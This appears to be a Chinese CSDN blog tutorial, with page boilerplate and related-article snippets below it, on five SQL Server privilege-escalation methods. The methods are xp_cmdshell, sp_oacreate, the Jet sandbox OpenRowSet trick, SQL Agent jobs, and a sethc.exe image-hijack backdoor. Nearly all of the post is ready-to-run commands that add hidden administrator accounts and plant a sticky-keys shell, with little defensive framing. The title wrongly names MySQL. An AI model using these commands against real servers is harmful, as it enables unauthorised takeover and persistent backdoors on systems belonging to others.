mysql 2008提权_通过Mssql提权的几种姿势

最新推荐文章于 2024-03-28 16:37:48 发布
最新推荐文章于 2024-03-28 16:37:48 发布
阅读量280 收藏
点赞数
文章标签: mysql 2008提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32101377/article/details/114743273
版权

本文记录针对SQL Server数据库,在拿到shell之后进行提权的5种方法。

一、 xp_cmdshell提权

f856e12a5209efd1baad1d000ce7cb1c.png

上面的数据库连接需要知道sa的密码,连接之后,在下面的sql命令处执行:

exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add'

就能成功的创建一个账户aaa并且加到管理员组:

ea922f6778f9ab420f00c2d3e79a6fc9.png

常见问题:

如果执行sql语句不成功,首先检查判断xp_cmdshell是否存在:

select count(*)from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell' ;

b474ef129805bc0e8f99628c2a3afcac.png

返回1是存在的,返回0则需要通过xplog70.dll恢复。

然后需要开启xp_cmdshell

EXEC sp_configure 'show advanced options', 1 ;

Reconfigure;

EXEC sp_configure 'xp_cmdshell', 1 ; --开启xp_cmdshell,如果关闭,需要将这里的1改为"0"

RECONFIGURE ; --以上命令开启用xp_cmdshell

这四条语句一起执行,然后语句中间没有空格,执行后可启用。

二、sp_oacreate和sp_oamethod提权

declare @cmd INT;

exec sp_oacreate 'wscript.shell',@cmd output;

exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true';

exec sp_oacreate 'wscript.shell',@cmd output;

exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true';

以上语句也是在sql一起执行,语句中间没有空格,但是执行可能会遇到问题:

34ae809b9d95907e6b0fb9b2a3cfde77.png

我们需要开启存储过程:

exec sp_configure 'show advanced options', 1;

RECONFIGURE;

exec sp_configure 'Ole Automation Procedures',1;

RECONFIGURE;

7f51bfedf88fa4d5c61a5323408acbb8.png

以上语句也是在sql一起执行,语句中间没有空格,如果存储过程删除的话需要利用odsole70.dll恢复存储过程再执行。

这样我们执行上面的语句之后就会创建一个hack的账户,并加到管理员组:

8b7baee291b53d0a5fb435ef4bc32129.png

三、沙盒提权

这种提权是利用access的沙盒机制,关闭沙盒之后执行代码。

首先用xp_regwrite这个存储这个存储过程对注册表进行写操作,关闭沙盒模式:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

6c42c22bfd152b28acbdc34c063d2dfd.png

然后利用sql语句添加一个帐号和密码都为sql$的帐号,同时加入管理员组进行提权:

创建账户:Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');

e887463d8b495fef56ddce305215ce9d.png

添加到管理员组:Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');

b7f88adbd6f293e03f18bca00d193e31.png

然后就创建了账户:

4c55545b259d69368573d2b5fa607e9e.png

遇到的问题:

SQL2005默认是禁用Ad Hoc Distributed,执行命令时,会提示错误。需要开启

exec sp_configure 'show advanced options',1 ;

reconfigure ;

exec sp_configure 'Ad Hoc Distributed Queries',1 ;

reconfigure;

daf32f7457a927a52f3c9fcf9d02800e.png

四、JOB提权

原理是创建一个任务x,并执行命令,命令执行后的结果,将返回给文档q.txt

首先需要启动sqlagent服务:

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

b986fbf6ab08957a517755a1b7280015.png

然后创建任务X,这里x为任务名称,并执行命令,命令执行后的结果,将返回给文本文档q.txt

use msdb

exec sp_delete_job null,'x'

exec sp_add_job 'x'

exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user hack1 hack1 /add &net localgroup administrators hack1 /add>c:/q.txt"'

exec sp_add_jobserver null,'x',@@servername

exec sp_start_job 'x';

ca74f6894c9d7efbae14de6d73f15acc.png

然后就可以看到已经创建了一个hack1的账户并加到了管理员组:

2dfb7d9e5035b6ed695acfcf6ebd51c5.png

五、利用映像劫持提权

利用regwrite函数修改注册表,起到劫持作用:

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

c2b888230696e3c7877efc16eea35787.png

然后检查是否劫持成功

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

09c26b433296036a41b427bd81d36a61.png

返回没有问题 利用远程连接然后5次shift键,发现没有启动粘滞键,而是启动了cmd,然后就可以创建用户了

65ceb62dd90e9c3dba9c998a6b825969.png

薄荷味糖豆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSSQL注入手工注入mssql
代码审计
04-18 2207
mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库,数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划
mysql数据库所需lib_mysqludf_sys_64.dll(64位)
10-03
必备,之后会出对应的教程
mssql&oracle数据库
m0_62207170的博客
03-19 1095
mssql&oracle数据库
Mssql常规[xp_cmdshell]
qq_31812157的博客
06-22 253
没什么好说的,主要是执行命令的之后的利用。
SQL Server 数据库常见总结
最新发布
m0_64481831的博客
03-28 1591
前面总结了linux和Windows的方式以及Mysql,这篇文章讲讲SQL Server数据库的
MSSQL
m0_72929851的博客
04-09 213
默认库判断服务器级别判断数据库级别。
系列(二)----Windows Service 服务器Mssql,GetPass,hash,LPK
fendo
03-29 1万+
(一)、Mssql 必要条件:获取到mssql数据库最高限用户sa的账号密码 Mssql默认端口:1433 Mssql最高限用户:sa 得到sa密码之后,通过工具直接连接上去。 MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。 (二)、GetPass 一款获取计算机
mysql.zip_ROOT_mysql_udf_udf mysql_
09-19
用的 udf 得到root帐号可以用这个
udf_udf_udf.dll下载_mysql_ballsv6__源码
10-04
mysql,udf所需要的dll文件,有64位和32位
必备神器->MYSQL高版本工具-V 2011
01-19
必备神器->MYSQL高版本工具-V 2011
Mysql 实例教程.doc
01-03
Mysql取实例教程, 利用mysql的前就是,服务器安装了mysql,mysql的服务没有降,(降也可以,没降的话就最好了),是默认安装以系统限继承的(system限). 并且获得了root的账号密码
MSSQL手工注入并
07-24
MSSQL手工注入并
mssql数据库之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行,利用的其实是数据库的运行限,所以只要我们满足以下条件即可进行: 1、 必须获得sa的账号密码或者与sa相同限的账号密码,且mssql没有被降。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system限。System限在Windows server2003中限仅比管理员小;而在2003以上的版本,则为最高限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
SQL通过SP_OA调用外部HTTP
08-31
DECLARE @Object int; DECLARE @HR int; DECLARE @Property nvarchar(255); DECLARE @Return nvarchar(255); DECLARE @Source nvarchar(255), @Desc nvarchar(255); DECLARE @httpStatus int; DECLARE @response varchar(8000); --创建 OLE 对象的实例 EXEC @HR = sp_OACreate N'MSXML2.XMLHTTP.6.0',@Object OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('Error Creating COM Component 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO END_ROUTINE END BEGIN --Open EXEC @HR = sp_OAMethod @Object,N'open',Null,'GET','http://localhost:1728/HttpServer/submit.aspx',FALSE; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('Open 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --setRequestHeader EXEC @HR = sp_OAMethod @Object,N'setRequestHeader',Null,'Content-Type','text/xml'; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('setRequestHeader 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --send EXEC @HR = sp_OAMethod @Object,N'send',Null,''; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('send 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --readyState EXEC @HR = sp_OAGetProperty @Object,'readyState', @httpStatus OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('readyState 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --verify status IF @httpStatus 4 BEGIN RAISERROR('readyState http status bad', 16,1) GOTO CLEANUP END --status EXEC @HR = sp_OAGetProperty @Object,'status', @httpStatus OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('getstatus 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --verify status IF @httpStatus 200 BEGIN Print Cast(@httpStatus As varchar) RAISERROR('Open http status bad', 16,1) GOTO CLEANUP END --responseText EXEC @HR = sp_OAGetProperty @Object, 'responseText', @response OUT IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('responseText 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END Print @response END CLEANUP: BEGIN EXEC @HR = sp_OADestroy @Object; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; SELECT HR = convert(varbinary(4),@HR),Source=@Source,Description=@Desc; END END END_ROUTINE: RETURN; GO
mysql mmsql 区别_【汇总】数据库mysqlmssql
weixin_30853033的博客
01-19 98
日期:2018-04-03 11:46:45作者:Bay0net介绍:利用 mssql 的 sa 账号、利用 MySQL 的 UDF 0x01、mssql 恢复 xp_cmdshell几个命令# 查看是否存在 xp_cmdshell(返回非 0 即存在)select count(*) from master.dbo.sysobjects where xtype='x' and name...
数据库_攻防
weixin_39953838的博客
01-15 1201
离别不是结束,遗忘才是!
mysql 2008_实战SQL Server
weixin_35501678的博客
01-27 220
前言:在授测试一网站时发现该网站已经被挂马。。aspx木马猜测出密码为admin,即可看到大马。。尝试自己的小马+菜刀进行连接。。拒绝访问发现该网站根目录下所有文件进行了访问控制。。无法上传自己的小马。没有办法,只能翻翻文件看看。。公众号getshell看到了公众号的配置以及地址。。(打马的地方)该文件夹下没有做访问控制,顺利上传getshell。。uploadsuccessok!添加管理员,打...
SQL Server 数据库的几种方法——教程
热门推荐
W小哥
01-20 1万+
一、简介 在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行。 数据库的前条件: 1、服务器开启数据库服务 2、获取到最高限用户密码 (除Access数据库外,其他数据库基本都存在数据库的可能) 二、使用xp_cmdshell进行 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa限则可以用sp_configure重新开启它。 启用: EXEC sp_configure ‘show advanced opti
Day5——学习之MSSQL数据库学习总结
0nc3的博客
12-19 542
0x00 SQLServer基础 1、SQLServer限 列出sql server 角色用户的限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述: 1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插入到数据库的域帐号而设计. 2.dbcr...
mysql mof原理_mof原理及其过程
05-16
而Mof则是一种利用Mof文件来限的攻击方式。 Mof的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行限来执行Mof文件中的命令,从而实现。具体过程如下: 1. 创建一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值